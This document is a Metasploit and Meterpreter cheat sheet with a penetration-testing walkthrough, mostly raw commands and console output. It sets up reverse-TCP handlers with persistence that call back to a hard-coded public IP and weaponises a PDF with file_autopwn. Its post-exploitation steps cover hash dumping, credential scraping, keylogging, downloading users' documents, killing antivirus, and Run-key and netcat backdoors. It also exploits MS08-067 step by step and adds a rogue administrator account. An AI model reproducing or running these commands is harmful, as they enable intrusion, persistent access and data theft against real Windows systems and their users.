MSF

=Metasploit= Steps: 1. Pick which exploit to use 2. Configure the exploit with remote IP address and remote port number 3. Pick a payload 4. Configure the payload with local IP address and local port number 5. Execute the exploit

Common Commands: msfconsole show expolit windows use iis50_webdav_ntdll show options set RHOST  set RPORT 80 check show targets show payloads set PAYLOAD win32_reverse show options set LHOST <your IP address show advanced exploit

MSF Complete Cheatsheet
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
 * 1) set AutoRunScript pathto script you want to autorun after exploit is run

exploit -j -z

file_autopwn rm -Rf /tmp/1 mkdir /tmp/1 rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf

./msfconsole

db_driver sqlite3 db_create pentest11 setg LHOST 75.139.158.51 setg LPORT 21 setg SRVPORT 21 setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf set SSL true set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp setg PAYLOAD windows/meterpreter/reverse_tcp set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 run

shows all the scripts run [tab]

persistence! broken ...if you use DNS name .. run persistence -r 75.139.158.51 -p 21 -A -X -i 30

run get_pidgin_creds

idletime sysinfo

SYSTEM SHELL ( pick a proc that is run by system ) migrate 376 shell

session hijack tokens use incognito impersonate_token "NT AUTHORITY\\SYSTEM"

escalate to system use priv getsystem

execute -f cmd.exe -H -c -i -t execute -f cmd.exe -i -t

list top used apps run prefetchtool -x 20

list installed apps run prefetchtool -p

run get_local_subnets

find and download files run search_dwld "%USERPROFILE%\\my documents" passwd run search_dwld "%USERPROFILE%\\desktop passwd run search_dwld "%USERPROFILE%\\my documents" office run search_dwld "%USERPROFILE%\\desktop" office

alternate download -r "%USERPROFILE%\\desktop" ~/ download -r "%USERPROFILE%\\my documents" ~/

alternate to shell not SYSTEM execute -f cmd.exe -H -c -i -t

does some run wmic commands etc run winenum

rev shell the hard way run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"

An example of a run of the file to download via tftp of Netcat and then running it as a backdoor. run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4 run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4

vnc / port fwd for linux run vnc

priv esc run kitrap0d

run getgui somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?! run killav

run winemun run memdump

run screen_unlock  upload /tmp/system32.exe C:\\windows\\system32\\ reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe" reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32 reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32 upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\" getuid ps getpid keyscan_start keyscan_dump migrate 520 portfwd add -L 10.4.4.4 -l 6666 -r 192.168.1.1 -p 80" portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell run myremotefileserver_mserver -h run myremotefileserver_mserver -p 8787

run msf_bind run msf_bind -p 1975 rev2self getuid

getuid

enumdesktops grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump run metsvc run scraper run checkvm run keylogrecorder run netenum -fl -hl localhostlist.txt -d google.com run netenum -rl -r 10.192.0.50-10.192.0.254 run netenum -st -d google.com run netenum -ps -r 10.192.0.50-254

Windows Login Brute Force Meterpreter Script run winbf -h

upload a script or executable and run it uploadexec

Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe" SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011

kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks catchme.exe -K "c:\Program Files\Kaspersky\avp.exe" catchme.exe -E "c:\Program Files\Kaspersky\avp.exe" catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy

Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network?
 * Nessus Scanning through a Metasploit Meterpreter Session

The Players: Attacker 172.16.186.132 Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).

Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

Preparing for a custom command line OpenSSH Installation in your lab

The basic steps to prepare a command line OpenSSH installation for Windows are as follows:

1. Download the setupssh.exe installation package from http://sshwindows.sourceforge.net/download

2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH

3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.

4. Export the following registry keys using the REG EXPORT command as follows:

REG EXPORT .HKLM\SOFTWARE\Cygnus Solutions. 1.REG REG EXPORT .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. 2.REG REG EXPORT .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. 3.REG

5. Concatenate all of these registry files together into one file. TYPE 1.REG 2.REG 3.REG >OPENSSH.REG

6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.

Performing an installation via command shell

Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.

Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.

Exploiting the Vulnerability

[root@localhost framework-3.2]# nc -v 192.168.1.40 445 Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded! [root@localhost framework-3.2]# ./msfconsole

msf > search exploits ms08_067 [*] Searching loaded modules for pattern 'ms08_067'... Exploits ======== Name Description --- windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40 RHOST => 192.168.1.40 msf exploit(ms08_067_netapi) > set TARGET 5 TARGET => 5 msf exploit(ms08_067_netapi) > show options

... truncated output ... Exploit target:

Id Name -- 5 Windows 2003 SP0 Universal

msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)

meterpreter > sysinfo Computer: SYSTEM-HJ28HHGL7N OS : Windows .NET Server (Build 3790, ).

Uploading your OpenSSH Files

meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH meterpreter > lpwd /mnt/PenTestTools/win32/OpenSSH meterpreter > cd \ meterpreter > cd "Program Files" meterpreter > mkdir openssh Creating directory: openssh meterpreter > cd openssh meterpreter > pwd C:\Program Files\openssh meterpreter > upload -r. . [*] uploading : ./uninstall.exe -> .\uninstall.exe [*] uploaded : ./uninstall.exe -> .\uninstall.exe [*] mirroring : ./bin -> .\bin [*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe [*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe [*] uploading : ./bin/chown.exe -> .\bin\chown.exe [*] uploaded : ./bin/chown.exe -> .\bin\chown.exe [*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll [*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll .... lots of output truncated ....

meterpreter > execute -f cmd.exe .i Process 848 created. Channel 66 created.

Modifying the Registry and Adding Your Own Username

Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.

Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\openssh>whoami whoami nt authority\system

C:\Program Files\openssh>reg import openssh.reg reg import openssh.reg The operation completed successfully.

C:\Program Files\openssh>net user inet_p0wned gameover /add net user inet_p0wned gameover /add The command completed successfully.

C:\Program Files\openssh>net localgroup administrators inet_p0wned /add net localgroup administrators inet_p0wned /add The command completed successfully.

C:\Program Files\openssh>cd etc cd etc

C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd ..\bin\mkpasswd -l >passwd C:\Program Files\openssh\etc>..\bin\mkgroup -l >group ..\bin\mkgroup -l >group

C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto [SC] CreateService SUCCESS

Start the OpenSSH Service

C:\Program Files\openssh\etc>sc start opensshd sc start opensshd SERVICE_NAME: opensshd TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 1916 FLAGS :

C:\Program Files\openssh\etc>sc query opensshd sc query opensshd SERVICE_NAME: opensshd TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0  C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24 The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**


 * Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don.t leave a gaping opportunity while testing.

C:\Program Files\openssh\etc>exit exit meterpreter > quit

[*] Meterpreter session 1 closed. msf exploit(ms08_067_netapi) > quit

Now, lets go ahead and SSH into our Windows server to check if things worked!

root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40 The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established. RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.

OpenSSH for Windows. Welcome aboard!

inet_p0wned@192.168.1.40's password: Could not chdir to home directory /home/inet_p0wned: No such file or directory Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\OpenSSH> C:\Program Files\OpenSSH>whoami system-hj28hhgl7n\inet_p0wned

C:\Program Files\OpenSSH>exit Connection to 192.168.1.40 closed. [root@localhost framework-3.2]#


 * Cleaning up:

To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.

C:\> SC STOP opensshd C:\> SC DELETE opensshd C:\> REG DELETE .HKLM\SOFTWARE\Cygnus Solutions. /f /va C:\> REG DELETE .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. /f /va C:\> REG DELETE .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. /f /va

C:\> CD "\Program Files" C:\Program Files> RMDIR /Q /S opensshd C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22 C:\Program Files> NET USER inet_p0wned /DELETE